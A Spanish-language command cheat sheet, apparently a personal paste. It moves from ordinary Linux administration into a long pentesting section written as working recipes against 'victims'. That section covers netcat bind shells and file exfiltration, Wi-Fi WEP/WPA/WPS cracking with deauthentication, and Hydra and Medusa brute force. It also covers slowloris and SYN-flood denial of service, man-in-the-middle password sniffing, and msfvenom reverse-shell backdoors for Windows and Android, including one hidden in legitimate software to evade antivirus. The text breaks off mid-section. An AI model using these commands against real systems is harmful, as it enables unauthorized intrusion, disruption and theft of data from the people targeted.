· 9 years ago · Sep 12, 2016, 12:58 AM
1##########################################################################
2##########################################################################
3######################### COMANDO UNIX #########################
4##########################################################################
5##########################################################################
6
7
8
9
10 .88888888:.
11 88888888.88888.
12 .8888888888888888.
13 888888888888888888
14 88' _`88'_ `88888
15 88 88 88 88 88888
16 88_88_::_88_:88888
17 88:::,::,:::::8888
18 88`:::::::::'`8888
19 .88 `::::' 8:88.
20 8888 `8:888.
21 .8888' `888888.
22 .8888:.. .::. ...:'8888888:.
23 .8888.' :' `'::`88:88888
24 .8888 ' `.888:8888.
25 888:8 . 888:88888
26 .888:88 .: 888:88888:
27 8888888. :: 88:888888
28 `.::.888. :: .88888888
29 .::::::.888. :: :::`8888'.:.
30 ::::::::::.888 ' .::::::::::::
31 ::::::::::::.8 ' .:8::::::::::::.
32 .::::::::::::::. .:888:::::::::::::
33 :::::::::::::::88:.__..:88888:::::::::::'
34 `'.:::::::::::88888888888.88:::::::::'
35 `':::_:' -- '' -'-' `':_::::'`
36
37
38
39
40[Un OS para gobernarlos, un OS para unirlos, un OS para encontrarlos y
41llevarlos a la tierra de Linus, donde juegan los Hackers]
42
43
44
45Definicin= "nda" singnifica nombre del archivo
46-----------------------------------------------
47
48sudo usermod -c “Titanlux†-l titanlux pi
49echo = mostrar un mensaje en pantalla
50echo prueba al pedo > nda = crea el archivo nda con el contenido "prueba al pedo"
51
52
53chmod = control de permisos
54chmod ugoa+-=rwx nda
55u = usuario
56g = grupo
57o = otros
58a = todos
59+ = autorizar
60- = desautorizar
61= = resetear
62x = ejecutable
63w = escritura
64r = lectura
65i = inmutable
66
67sudo chown -R odin /directorio = dar permisos al usuario a dicho directorio.
68
69
70sudo chattr +i /etc/resolv.conf = volver inmutable un fichero (no se puede modificar)
71sudo chattr -i /etc/resolv.conf
72
73sudo rfkill list = muestras los dispositivoos wifis bloqueados por software o hardware
74
75cal = muestra calendario
76cal 06 1979 (calendario de Abril de 1979)
77
78mount = montar unidades de HD, CD-ROM. floppy...
79umount = desmontar unidades de HD, CD-ROM. floppy...
80
81df = Te da un listado de los discos que tienes
82
83ls = listado
84l = listado + detalles
85a = listado + ocultos
86
87top = informacion general del sistema, cpu y mem
88m informacion de la meria usada
89p para el CPU
90q salir
91n catidad de procesos a mostrar
92
93mkdir = crear un directorio
94mkdir prueba (crea el directorio prueba)
95
96more = mostrar un archivo por pantalla
97
98mail = enviar o recibir correo
99mail usuario (envia correo a usuario)
100
101write = enviar un mensaje
102
103mesg = permitir o prohibir la recepcin de mensajes
104
105sort = ordenar archivos
106
107find = buscar archivos
108find -name passwd (busca el archivo passwd)
109find / -name usuario
110whereis nda = nos muestra la ruta del nda
111
112lsmod = muestra los modulos instalados
113
114modprobe = prueba modulos
115
116modinst = instalacin de modulos
117
118less = ls | less
119
120at = schedulear una tarea
121at hora dia archivo
122at now + <n> (minutes|hours|days|weeks|mouhts)
123at -l = lista los procesos en cola
124at -d <n> = elimina el proceso n
125fg = foreground (primer plano)
126fg %1 = (trae a primer plano el job 1)
127
128bg = background (segundo plano)
129bg %1 = (lleva a segundo plano el job 1)
130
131& = ejecuta en segundo plano
132find -name passwd & = busca en segundo plano
133
134chgrp = cambiar el grupo dueo
135
136ps -aux = todos los procesos
137ps -A = Lastado de proceso
138kill + Pid = mata el proceso
139kill -9 n de proceso = destruye el proceso
140kill %1 = mata el job 1
141
142rpm = instalacion de paquetes
143rpm -i paquete.rpm (instala)
144rpm -Uvh paquete.rpm (instal los (i*86)
145rpm -e paquete.rpm (desinstala)
146rpm -u paquete.rpm (actualiza)
147rpm -ivh --nodeps (instala un programa, no importandole las dependencias)
148rpm -ivh --forge (instala a la fuerza)
149date = fecha y hora
150
151tty = nombre del terminal
152
153cd = cambiando de directorio
154cd .. (bajar)
155cd /home/src/
156
157gcc = Compilador
158gcc archivo.c = compila archivo.c y te crea un eje. a.out
159gcc archivo.c -o nombre = compilar archivo.c y te crea un eje. nombre
160
161make = crear (compilar soft o instaladores)
162make install = compila e instala
163./configure = Configura el soft, para previa instalacin
164
165pwd = muestra donde estas en el arbol
166
167cp = copiando archivos
168
169history = muestra el historial de comandos
170!n de comando historico = ejecuta el comando
171
172./ = ejecutar binarios
173./john (ejecuta el john) "Deve ejecutarse desde su direcctorio"
174
175ln = crea enlaces simbolicos
176
177mv = moviendo o renombrando archivos
178
179rm = remueve archivos
180rm -rf = remueve directorios
181
182who = ver quien esta conectado a la maquina
183w = ver usuarios conectados a la maquina detallado
184
185/usr/sbin/adduser -d /home/.usuario -m usuario = (aadimos el user usuario)
186/usr/sbin/adduser -u 0 -g root -d /home/.usuarioroot -m usuarioroot
187
188usermod -a -G sudo user1 = Añadimos al usuario al grupo sudo para que nos permita realizar tareas de administrador
189chsh -s /bin/bash user1 = Cambiamos la shell a /bin/bash
190
191jobs = trabajos que estan corriendo
192
193shutdown -h now = apagar el sistema ya
194halt = apagar el sistema
195reboot = reiniciar el sistema
196
197cat = muestra el contenido de un archivo
198cat nda (muestra el contenido de nda)
199
200comm = compara dos archivos
201comm nda1 nda2
202
203lpr = imprimir archivos
204
205inport -w root capura.png = hace capturas de tu escritorio
206
207tail -F achivo = monitoriza el archivo
208
209uptime = tiempo de actividad del servidor
210
211sudo /opt/vc/bin/vcgencmd measure_temp = temperatura de la cpu
212
213
214
215
216
217
218
219**********************************************************************
220**********************************************************************
221***** PROCESOS
222**********************************************************************
223**********************************************************************
224
225sudo /etc/init.d/servecio (start | restart | stop | status)
226sudo service servicio (start | restart | stop | status)
227
228/etc/rc.d/init.d/nda stop = para el proceso
229/etc/rc.d/init.d/nda start = arranca el proceso
230/etc/rc.d/init.d/nda restart = resetea el proceso
231/etc/rc.d/init.d/nda restart = estado del proceso
232
233
234Parar servicios
235sudo chkconfig nombredelservicio off
236
237
238
239**********************************************************************
240**********************************************************************
241***** CREAR IMÃGENES DE DISCO
242**********************************************************************
243**********************************************************************
244mkisofs -T -l -o imagen.iso carpeta1 carpeta2 = hace una imagen de las carpetas
245mkisofs -T -l -o imagen.iso pepito.mpg = hace una imagen del pepito.mpg
246
247
248
249**********************************************************************
250**********************************************************************
251***** ALIAS Y BASHRC
252**********************************************************************
253**********************************************************************
254Si quieres que los cambios sean permanentes los debo añadir a .bashrc
255alias apagar = 'shutdown -h now'
256
257#### COLORES EN BASH ####
258Debemos de editar el fichero .bashrc y que ponga:
259
260# .bashrc
261
262# User specific aliases and functions
263
264# Source global definitions
265if [ -f /etc/bashrc ]; then
266 . /etc/bashrc
267fi
268eval `dircolors`
269alias ls="ls --color $*"
270alias proxychains="proxychains 2> /dev/null"
271alias actualizar="sudo apt-get update && sudo apt-get upgrade"
272PS1="\[\033[01;32m\]\u@\h \[\033[01;34m\]\w $ \[\033[00m\]"
273
274
275
276**********************************************************************
277**********************************************************************
278***** COMANDOS ÚTILES REDES
279**********************************************************************
280**********************************************************************
281
282ifconfig = informacin de las placas de red
283up eth0 = levanta la placa de red 0
284down eth0 = baja la placa de red 0
285ifconfig eth0 10.0.0.1 255.0.0.0 = ip + mascara
286
287route = ruta/s | tablas de ruteo
288route add -net 10.0.0.1 netmask 255.0.0.0 dev eth0 gw 10.0.0.5
289route add default gw 192.168.1.1 eth0 = gateway default
290
291ipchains -A input -s 0.0.0.0/0.0.0.0 -p tcp -j DENY
292ipchains -A forward -s 192.168.1.0/24 -j MASQ
293A = agregar regla
294D = quitar regla
295input = ingreso de paquetes
296forward = forwardeo de paquetes
297output = salida de paquetes
298s = origen de los paquetes a tratar
299d = destino de los paquetes a tratar
300p = protocolo a filtrar
301i = interfaz
302j DENY = rechazar paquetes
303j MASQ = enmascarar paquetes
304j ACCEPT = aceptar paquetes
305
306
307netstat -an = Ver conexiones de red
308netstat -pan --tcp --udp = Averiguar que programas están usando los puertos de la red
309
310sudo macchanger -m 00:11:22:33:44:55 mon0 = cambiar MAC
311
312
313
314
315**********************************************************************
316**********************************************************************
317***** ESPECIALES
318**********************************************************************
319**********************************************************************
320
321linuxconf = configurador del sistema
322
323netconf = configurador de la red
324
325userconf = administrador de usuarios
326
327setup = varias opciones de configuracion (hard y soft)
328
329Xconfig = configurador del X
330
331vi = editor / creador de archivos
332
333
334**********************************************************************
335**********************************************************************
336***** KERNEL
337**********************************************************************
338**********************************************************************
339
340make config = compilador en terminal
341
342make menuconfig = compilador en menes
343
344make xconfig = compilador en x
345
346make dep;make clean = borra y comienza a compilar de cero
347
348make zImage = compila la nueva imagen del kernel
349
350make zdisk = crear disquete de arranque
351
352make zlilo = compila, actualiza y configura el lilo
353
354
355**********************************************************************
356**********************************************************************
357***** ARCHIVOS
358**********************************************************************
359**********************************************************************
360
361/etc/hosts = declaración de DNS
362
363/etc/inetd.conf = lista de servicios
364
365/etc/hosts.deny = hosts a los que se le prohibe la comunicacin
366
367/etc/hosts.allow = hosts a los que se le permite la comunicacin
368
369/etc/resolv.conf = ips de los dns
370
371/etc/network/interfaces = configuración de red
372
373/etc/services = nombre, nmero, y protocolo asignado a cada socket
374
375/etc/protocol = listado de protocolos
376
377
378**********************************************************************
379**********************************************************************
380***** ASCII
381**********************************************************************
382**********************************************************************
383
384Alt + 062 >
385Alt + 062 <
386Alt + 061 =
387Alt + 124 |
388
389
390
391
392**********************************************************************
393**********************************************************************
394***** APT-GET
395**********************************************************************
396**********************************************************************
397
398apt-get es una herramienta fabulosa que nos ayudará a instalar los paquetes y mantener nuestro linux actualizado.
399
400sudo apt-get update // refrescar actualizaciones disponibles
401sudo apt-get upgrade // actualizar todos los paquetes
402sudo apt-get dist-upgrade // actualizar versión
403sudo apt-get install paquete // instalar paquete
404sudo apt-get remove paquete // desinstalar paquete
405sudo apt-get --purge remove paquete // desinstalar paquete y eliminar configuración
406sudo apt-get autoremove // eliminar paquetes obsoletos
407sudo apt-get -f install // intentar arreglar paquetes
408sudo apt-get -d paquete // Para bajar el paquete y sus dependencias sin instalar.
409sudo dpkg --configure -a // intentar arreglar paquetes rotos
410sudo dpkg -i paquete.deb // instalar archivo paquete.deb
411/etc/apt/sources.list // lista de repositorios APT
412
413
414
415
416**********************************************************************
417**********************************************************************
418***** COPIAS DE SEGURIDAD EN DISCO
419**********************************************************************
420**********************************************************************
421sudo umount /dev/mmcblk0p1 && sudo umount /dev/mmcblk0p2
422sudo dd if=/dev/mmcblk0 of=/media/misbackups/mibackup.img bs=1M
423
424
425**********************************************************************
426**********************************************************************
427***** COMPARTIR FICHEROS EN MAC
428**********************************************************************
429**********************************************************************
430sudo apt-get install netatalk = instalamos el paquete
431sudo /etc/init.d/netatalk stop = paremos el servicio
432sudo nano /etc/netatalk/AppleVolumes.default = fichero de configuración
433
434Añadimos lo siguiente
435
436—— Añadimos lo siguiente ——
437~/ “Directorio Homeâ€
438/ “Directorio RaÃzâ€
439/media “Mediaâ€
440—— hasta aquà ——
441
442
443**********************************************************************
444**********************************************************************
445***** MONTAR DISCO AUTOMÃTICAMENTE
446**********************************************************************
447**********************************************************************
448sudo apt-get install usbmount
449sudo apt-get install ntfs-3g
450sudo cp /etc/usbmount/usbmount.conf /etc/usbmount/usbmount.conf.orig
451sudo nano /etc/usbmount/usbmount.conf
452
453—— Añadimos lo siguiente ——
454FILESYSTEMS="vfat ext2 ext3 ext4 hfsplus ntfs"
455—— hasta aquà ——
456
457
458**********************************************************************
459**********************************************************************
460***** X SESSIONS
461**********************************************************************
462**********************************************************************
463sudo apt-get -y install Xfce4 Xfce4-screenshooter
464sudo update-alternatives --config x-session-manager
465
466
467
468
469
470**********************************************************************
471**********************************************************************
472***** COMPRIMIR DESCOMPRIMIR
473**********************************************************************
474**********************************************************************
475
476tar -cf nda.tar /directorio/archivos/acopiar/ = comprime en .tar lo que pongas en el /..../
477tar -zxvf nda.tar = (descomprimir archivos tar.gz)
478tar czf pi_home.tar.gz pi
479clear = limpia la pantalla de un terminal
480Archivos .tar.gz:
481Comprimir: tar -czvf empaquetado.tar.gz /carpeta/a/empaquetar/
482Descomprimir: tar -xzvf archivo.tar.gz
483
484Archivos .tar:
485Empaquetar: tar -cvf paquete.tar /dir/a/comprimir/
486Desempaquetar: tar -xvf paquete.tar
487
488Archivos .gz:
489Comprimir: gzip -9 index.php
490Descomprimir: gzip -d index.php.gz
491
492Archivos .zip:
493Comprimir: zip archivo.zip carpeta
494Descomprimir: unzip archivo.zip
495
496
497
498
499
500##########################################################################
501##########################################################################
502########################## PENTESTING ##########################
503##########################################################################
504##########################################################################
505
506 knock, knock, Neo.
507
508
509 (`. ,-,
510 ` `. ,;' /
511 `. ,'/ .'
512 `. X /.'
513 .-;--''--.._` ` (
514 .' / `
515 , ` ' Q '
516 , , `._ \
517 ,.| ' `-.;_'
518 : . ` ; ` ` --,.._;
519 ' ` , ) .'
520 `._ , ' /_
521 ; ,''-,;' ``-
522 ``-..__``--`
523
524
525**********************************************************************
526**********************************************************************
527***** NMAP
528**********************************************************************
529**********************************************************************
530-- Escaneos básicos
531
532root@kali:/# nmap -v -sS -O ip = Escanea host
533root@kali:/# nmap -P0 = Escanea host
534
535-- Escanea broadcast y guarda un log
536
537root@kali:/# nmap -n -sP -PI 210.14-50.*.* |grep retur >> canutosparatodos.txt
538
539-- Escanea host que tenga los puertos (22,23) abiertos y en el rango de ip puesto
540
541root@kali:/# nmap -O -p 22,23 193.25.35.*
542
543-- Geolocalización
544
545root@kali:/# nmap --script ip-geolocation-* [host-victima]
546root@kali:/# nmap --script whois [host-victima]
547
548-- Emails
549
550root@kali:/# nmap -p 80 --script http-google-email, http-email-harvest [host-victima]
551
552-- Fuerza bruta DNS
553
554root@kali:/# nmap -p 80 --script dns-brute [host-victima]
555
556-- Descubriendo hostnames adiccionales
557
558root@kali:/# nmap -p 80 --script http-reverse-ip [host-victima]
559
560-- Buscando redes zombis
561
562root@kali:/# nmap -iR 1000 —script ipidseq -T5 -v -oA zombies
563
564root@kali:/# nmap -iR 1000 —script ftp-bounce -T5 -v -oA bouncyFTP
565
566root@kali:/# nmap —script ftp-anon -T5 -iR 1000 -v -oA ftpAnon
567
568-- Una vez que tengamos la red zombie.
569
570root@kali:/# nmap -Pn -sI 150.244.214.206 8.8.8.8
571
572-- Detectar ordenadores conectados a la red
573root@kali:/# nmap -sP 192.168.1.1-254
574
575**********************************************************************
576**********************************************************************
577***** NETCAT
578**********************************************************************
579**********************************************************************
580nc -vv -l 80 = Poner a la escucha el puerto 80.
581nc -vv host port = Ver version del servicio del puerto
582nc -nvv <IP> <port> = Ver la version del port
583
584Utilice Netcat para conectarse a un sistema remoto
585nc 192.168.1.105 80
586
587Utilice Netcat Banner Grab para las huellas digitales OS
588nc 192.168.1.105 80
589HEAD / HTTP/1.0
590
591Escuchar conexiones
592nc - l -p 6996
593
594Crear backdoor
595nc -l -p 6996 -e cmd.exe
596nc -l -p 6996 -e /bin/bash
597
598y para conectar al backdoor
599nc 192.168.1.105 6996
600
601Copiar archivos
602type financialprojections.xls | nc 192.168.1.104 6996
603
604Recibir archivos
605nc -l -p 6996 > financialprojections.xls
606
607
608
609**********************************************************************
610**********************************************************************
611***** NCFTP
612**********************************************************************
613**********************************************************************
614ncftp -u login -p password ftp.servidor.com
615put nda = subir ficheros al ftp
616get nda = bajar fichero del ftp
617put -rf directorio = Subir directiorios completos
618get -rf directorio = Bajar directorios completos
619
620NOTA: Utiliza los mismo comandos que una shell: cp, mkdir, rename ...
621
622
623
624
625**********************************************************************
626**********************************************************************
627***** SUBIR ARCHIVOS A UNA WEBSHELL
628**********************************************************************
629**********************************************************************
630wget http://www.url.org/e-local.c
631TFTP -i TuIP GET backdoor.c /home/victima/
632
633
634
635
636**********************************************************************
637**********************************************************************
638***** SSH
639**********************************************************************
640**********************************************************************
641
642ssh usuario@ip = conectar ssh
643ssh -v usuario@ip = conectar ssh en modo debug
644
645Si quieres copiar ficheros de una máquina a otra
646
647scp /etc/snort/rules/community.rules pi@192.168.1.11:/home/pi/community.rules
648
649otra forma de hacerlo es a lo snowden
650
651export RSYNC_RSH=ssh
652rsync -P ghost@216.66.xx.xx:/home/ghost/astro_noise /home/amnesia/Persistent/Year -av
653
654
655
656**********************************************************************
657**********************************************************************
658***** TUNELIZAR CONEXIONES CON PROXYCHAINS
659**********************************************************************
660**********************************************************************
661# ssh –NfD [puerto a la escucha en local] [user ssh]@[ip]
662
663• El parámetro –N: Le decimos a la máquina remota que no ejecute ningún comando a través de la sesión abierta de SSH.
664• El parámetro –f: Deja la conexión SSH en background una vez nos autenticamos.
665• El parámetro –D: Crea un túnel para realizar port-forwarding. Este es el parámetro dónde se está creando el servidor SOCKS. El puerto que se queda abierto en nuestra máquina es el que se indica con el parámetro –D, por ejemplo utilizaremos 1080. Todo lo que enviemos desde nuestra máquina al puerto 1080 será redirigido hacia el túnel SOCKS que estamos creando.
666
667Editamos el fichero /etc/proxychains.conf y añadimos la dirección local y el puerto que hemos usado.
668
669socks4 127.0.0.1 1080
670
671Podremos pivotar con más máquinas, para esto simplemente tendrÃamos que repetir el paso y asà pasarÃa por otra máquina, incrementando nuestro anonimato, eso si, debes utilizar otro puerto, por ejemplo 1081.
672
673socks4 127.0.0.1 1081
674
675**********************************************************************
676**********************************************************************
677***** TRUCOS DE SEGURIDAD LINUX
678**********************************************************************
679**********************************************************************
680Este programita, nos permite tener algunas chuletas de nuestros software de seguridad, para instalarlo basta con
681
682# pip install cheat
683
684Para ver su funcionamiento, usaremos de ejemplo nmap.
685
686# cheat -s nmap
687
688
689**********************************************************************
690**********************************************************************
691***** PHP LARAVEL
692**********************************************************************
693**********************************************************************
694php -S 192.168.0.50:8000 = arranca servidor php
695php artisan serve = arranca laravel
696php artisan serve --host=192.168.1.12 --port=8000
697php artisan db:seed --class=tBuildPhasesTableSeeder = cargar seeder
698php artisan db:seed = cargar seeders
699php artisan app:name Gatoflaco = Cambiar namespaces de la apliación
700php artisan:make auth --views = Genera las vistas y todo para el user ;)
701php artisan migrate:refresh --seed = refrescar migración laravel
702php artisan migrate:rollback = reiniciar migración laravel
703php artisan migrate:install = comienza migración laravel
704
705**********************************************************************
706**********************************************************************
707***** MYSQL
708**********************************************************************
709**********************************************************************
710
711mysqldump nombre_base_de_datos > archivo_de_destino.sql
712mysqldump -u USUARIO -p PASSWORD nombre_base_de_datos > archivo_de_destino.sql
713mysql -u root mysql -p
714
715mysql> CREATE DATABASE inmo;
716
717mysql> use inmo = seleccionar tabla
718
719CREATE USER 'adri' IDENTIFIED BY ‘password’;
720GRANT ALL PRIVILEGES ON * . * TO 'adri’;
721para habilitar conexiones remotas editar /etc/mysql/my.conf y comentar #bind-address 127.0.0.1
722
723
724
725**********************************************************************
726**********************************************************************
727***** NODE JS
728**********************************************************************
729**********************************************************************
730nmp install = instalar repositorios de nodes, similar a composer
731
732**********************************************************************
733**********************************************************************
734***** PYTHON
735**********************************************************************
736**********************************************************************
737pip install paquete = instala paquete/librerÃa python
738
739**********************************************************************
740**********************************************************************
741***** VNC
742**********************************************************************
743**********************************************************************
744
745vncserver :1 -geometry 1280x800 -depth 16 -pixelformat rgb565
746
747**********************************************************************
748**********************************************************************
749***** GIT
750**********************************************************************
751**********************************************************************
752
753git clone https://github.com/savio-code/fern-wifi-cracker.git = clocar proyecto git
754
755**********************************************************************
756**********************************************************************
757***** HACKEAR WIFI WEP
758**********************************************************************
759**********************************************************************
760
761Poner en modo promiscuo (monitor)
762# airmon-ng start wlan0
763
764Capturar tráfico
765# airodump-ng mon0
766
767Enfoque airodump-ng en un punto de acceso y canal
768# airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
769
77008: 86: 30: 74: 22: 76 es el BSSID del AP
771-c 6 es el canal del AP está operando en
772WPAcrack es el archivo que desea escribir en
773mon0 es el adaptador inalámbrico de monitoreo *
774
775
776## replay death
777aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
778
779100 es el número de fotogramas de autenticar al que desea enviar
78008: 86: 30: 74: 22: 76 es el BSSID del AP
781mon0 es el adaptador inalámbrico de monitoreo
782
783## Diccionario de password
784aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
785
786
787WPAcrack-01.cap es el nombre del archivo que escribimos en el comando airodump-ng
788/ PenTest / contraseñas / lista de palabras / darkc0de es la ruta absoluta al archivo de contraseña
789
790
791
792
793**********************************************************************
794**********************************************************************
795***** HACKEAR WIFI WEP
796**********************************************************************
797**********************************************************************
798iwconfig
799
800Poner dispositivo en modo monitor
801airmon-ng start wlan0
802
803Empezar a capturar el tráfico de la red
804airodump-ng mon0
805
806Empezar captura de datos de AP especÃfico
807airodump-ng --bssid 00:09:5B:6F:64:1E -c 11 -w WEPcrack mon0
808
809Inyectar tráfico ARP
810aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 mon0
811
812Cracker el password.
813aircrack-ng WEPcrack-01.cap
814
815
816root@kali:~# airodump-ng -c 9 -w WEP --bssid 50:67:F0:AC:92:D8 wlan0mon
817root@kali:~# aireplay-ng -1 0 -a 50:67:F0:AC:92:D8 wlan0mon
818root@kali:~# aireplay-ng -3 -b 50:67:F0:AC:92:D8 wlan0mon
819root@kali:~# aircrack-ng WEP-02.cap
820
821salir de modo escucha
822root@kali:~# iw wlan0mon del
823
824de q
825WLAN_3C = Z5067F0B12C3C
826
827próxima:
828BSSID = D0AEECA7AC90 ESSID = WLAN_AC90
829
830
831crunch 8 9 0123456789 | aircrack-ng -a 2 datosnuevos-01.cap -e default -b D0:AE:EC:A7:AC:90 -w -
832
833crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid D0:AE:EC:A7:AC:90 -w- datosnuevos-01.cap
834
835
836**********************************************************************
837**********************************************************************
838***** HACKEAR WIFI CON WPS ACTIVO
839**********************************************************************
840**********************************************************************
841airmon-ng start wlan0
842root@kali:~# wash -i wlan0mon
843root@kali:~# reaver -i wlan0mon -b F8:63:94:E4:9C:C6 --fail-wait=360 -vv
844—
845root@kali:~# reaver -i wlan0mon -b F8:63:94:E4:9C:C6 -c 11 -N -S --fail-wait=360 -vv
846—
847Una vez tengamos el pin
848root@kali:~# reaver -i wlan0mon -b F8:63:94:E4:9C:C6 -c 11 -s y -vv -p 12345670
849
850- o
851
852root@kali:~# wpa_supplicant -D wext -i wlan0mon -c wpa_sup.conf -B
853root@kali:~# wpa_cli
854wps_reg F8:63:94:E4:9C:C6 12345670
855
856Nota: Ninguna de las dos me ha funcionado aun.
857
858
859
860**********************************************************************
861**********************************************************************
862***** MAN IN THE MIDDLE
863**********************************************************************
864**********************************************************************
865
866Uso:
867sudo ./mitm.py
868Screehshot: http://bit.ly/20u54uG
869After Target Poisoned:
870Ejecutar sniffers en terminales externos
871Nota: Tu interfaz local puede ser diferente
8721. driftnet -i eth0
873driftnet -- capturará todo el tráfico de la imagen, cuando la vÃctima busque un sitio web.
8742. urlsnarf -i eth0
875urlsnarf -- Captura todas las direcciones de sitios web visitados vÃctimas por la máquina de la vÃctima.
8763. dsniff -i eth0
877dnsiff -- Sniffs contraseñas en texto plano. los intentos de autenticación únicas
8784. webspy - Start your favorite browser from the command line: e.g. iceweasel
879webspy -- Relojes en tiempo real, ya que la vÃctima se encuentre navegando, su navegador resacas junto con ellos, automágicamente.
8805. Navegar por la máquina de la vÃctima.
881Nota: webspy autostart, basta con ejecutar el navegador
882
883
884
885
886
887**********************************************************************
888**********************************************************************
889***** FUERZA BRUTA
890**********************************************************************
891**********************************************************************
892
893hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
894
895
896
897
898
899Host = 192.168.1.69
900Method = http-form-post
901URL = /w3af/bruteforce/form_login/dataReceptor.php
902Form parameters = user=^USER^&pass=^PASS^
903Failure response = Bad login
904Users file = users.txt
905Password file = pass.txt
906Threads = -t 10
907Wait for timeout = -w 30
908Output file = -o hydra-http-post-attack.txt
909
910
911
912hydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e ns -t 10
913
914hydra -L /root/listausuarios.txt -P /roo/pass.txt IP-VICTIMA ftp
915
916medusa -h Dirección IP -P /root/Desktop/password.lst -u usuario -M ssh
917
918medusa -h 192.168.1.10 -P /root/Desktop/password.lst -u usuario -M ssh
919
920
921Para evitar los ataques
922
923iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent –set
924iptables -I INPUT -p tcp –dport 22 -i tarjeta_interfaz_red -m state –state NEW -m recent –update –seconds 40 –hitcount 3 -j DROP
925
926
927**********************************************************************
928**********************************************************************
929***** ATAQUES DDOS SERVER
930**********************************************************************
931**********************************************************************
932git clone https://github.com/llaera/slowloris.pl.git
933chmod +x slowloris.pl
934perl ./slowloris -dns 192.168.1.11 -port 8888
935
936###### OTRA OPCIÓN DDOS##############
937Con metasploit
938use auxiliary/dos/tcp/synflood
939set RHOST 217.217.242.253
940exploit
941
942**********************************************************************
943**********************************************************************
944***** MAN IN THE MIDDLE
945**********************************************************************
946**********************************************************************
947
948websploitweb
949msfconsole
950wsf> use network/mitm
951wsf> show options
952wsf> set TARGET 192.168.0.120
953wsf> run
954
955
956
957**********************************************************************
958**********************************************************************
959***** WIRESHARK
960**********************************************************************
961**********************************************************************
962Filter: tcp.srcport==80
963
964
965**********************************************************************
966**********************************************************************
967***** EXPLOTAR ESCRITORIO REMOTO
968**********************************************************************
969**********************************************************************
970./crowbar.py -b rcp -s IP-VICTIMA -U /root/listadeusuarios.txt -C /roo/pass.txt -d
971
972
973
974**********************************************************************
975**********************************************************************
976***** CREAR BACKDOOR WINDOWS
977**********************************************************************
978**********************************************************************
979
980Para atacar fuera de la lan es imprescindible abrir el puerto en el router, evitar usar 4444 ya que está un poco quemado.
981
982# msfconsole
983
984# msfpayload windows/meterpreter/reverse_tcp S
985
986Ahora para crear el backdoor ejecutable, solo necesitamos el parámetro LHOST
987
988# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.122 LPORT=9999 X > backkdoor.exe
989
990Ahora necesitamos abrir metasploit para usar el módulo.
991
992msf> use exploit/multi/handler
993msf> set PAYLOAD windows/meterpreter/reverse_tcp
994msf> set LHOST 192.169.1.13
995msf> set LPORT 9999
996msf> exploit
997
998Ahora cuando se ejecute el backdoor, se conectará con nosotros.
999
1000Ahora podemos hacer un "ps" para ver los procesos que están corriendo en la máquina infectada y migrar el proceso a internet explorer, que supongamos tiene el proceso 1121
1001
1002meterpreter> migrate 1121
1003
1004Este backdoor, lo detectarán la gran mayorÃa de los antivirus, la mejor manera es crearse su propia puerta trasera.
1005
1006
1007
1008I
1009**********************************************************************
1010**********************************************************************
1011***** BACKDOOR CON METASPLOIT
1012**********************************************************************
1013**********************************************************************
1014
1015Listado dispnibles de puertas trasetas.
1016
1017# msfpayload -l
1018
1019Enumerar todas las opciones disponibles para windows/meterpreter/bind_tcp payload
1020
1021# msfpayload windows/meterpreter/bind_tcp O
1022
1023Crear un Meterpreter reverse_tcp payload para conectar de nuevo a nuestra IP en el puerto 443.Después lo guarda como un archivo ejecutable de Windows con el nombre payload.exe
1024
1025# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X >
1026payload.exe
1027
1028Crear una carga útil reverse_tcp Meterpreter para conectar de nuevo a nuestra IP y la guarda como format.Se puede combinar con msfencode.
1029
1030# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R >
1031payload.raw
1032
1033Exportar como código shell C-formateado
1034
1035# msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
1036
1037Exportar como %u codificado JavaScript
1038
1039# msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
1040
1041
1042**********************************************************************
1043**********************************************************************
1044***** EVADIR ANTIVITUS CON MSFENCODE
1045**********************************************************************
1046**********************************************************************
1047
1048De esta forma podremos ocultar un virus en un software legÃtimo.
1049
1050# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | msfencode -x softwareoriginal.exe -t exe -o viruscamuflado.exe -e x86/shikata_ga_nai
1051
1052
1053
1054**********************************************************************
1055**********************************************************************
1056***** HACKEAR ANDROID
1057**********************************************************************
1058**********************************************************************
1059
1060Comprobamos nuestra ip
1061
1062# ifconfig
1063
1064Abrimos Metasploit
1065
1066Aplicacaciones >> Kali Linux >> Servicios del Sistema >> Metasploit >> Comunity / pro start
1067
1068Iniciar la consola
1069
1070# msfconsole
1071
1072Conectar a base de datos
1073
1074msf> db_connect
1075
1076Payload a utilizar
1077
1078# msfpayload android/meterpreter/reverse_tcp LHOST=(ipe_de_nosotros) LPORT=4444 R > (nombre_de_aplicacion.apk)//Obsoleto
1079
1080# msfvenom -p android/meterpreter/reverse_tcp LHOST=5.40.165.3 LPORT=4444 R > dear_petter.apk
1081
1082
1083Ejecutar exploit y dejar al escucha el handler
1084
1085# msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=(ipe_de_nosotros) LPORT=4444 E
1086
1087Ver todos los comando que se pueden usar una vez dentro
1088
10891.- help (muestra todos los comandos)
10902.- shell (entra a todos los archivos de celular)
10913.- ls (muestra todos los directorios)
10924.- download (descarga archivos) ejemplo download /(ubicación_de_archivo)\ (archivo_a_descargar) /(ubicación_a_descargar)
1093
1094
1095-------------
1096-------------
1097
1098
1099
1100# msfvenon -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R > virusandroid.apk
1101
1102# msfconsole
1103
1104msf> db_connect
1105
1106Ahora ejecutaremos el handler, que básicamente lo que hace es ponerse a la escucha.
1107
1108msf> use multi/handler
1109
